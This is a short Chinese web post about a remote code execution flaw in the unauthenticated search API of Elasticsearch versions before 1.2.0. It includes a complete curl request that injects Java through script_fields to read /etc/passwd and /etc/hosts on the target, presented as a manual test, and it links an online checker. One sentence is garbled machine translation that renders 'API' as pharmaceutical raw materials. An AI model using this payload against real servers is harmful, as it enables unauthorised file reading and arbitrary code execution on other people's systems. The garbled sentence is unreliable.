<p>Elasticsearch是一个流行的开源的搜索和分析引擎。</p><p>这是一个远程命令执行漏洞利用Elasticsearch,利用Elasticsearch 1.2.0 之前版本的默认配置。</p><p>问题出现在 REST API,在没有身份认证的情况下,搜索功能允许动态脚本执行,可用于远程该漏洞被发现在其他的原料药,这并不需要验证,在搜索功能允许动态脚本执行。攻击者可以利用它远程执行任何 Java 代码。<br></p><p>手动测试:</p><p>读取目标机器的 <font color="#e33737">/etc/passwd</font> 和 <font color="#e33737">/etc/hosts</font></p><pre class="">curl -XPOST 'http://localhost:9200/_search?pretty' -d '
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {}
}
}
},
"script_fields": {
"/etc/hosts": {
"script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\Z\").next();"
},
"/etc/passwd": {
"script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\Z\").next();"
}
}
}
</pre><p></p><p>在线检测地址:<a href="http://tool.scanv.com/es.html" target="_blank">http://tool.scanv.com/es.html</a></p>
全部评论 (2)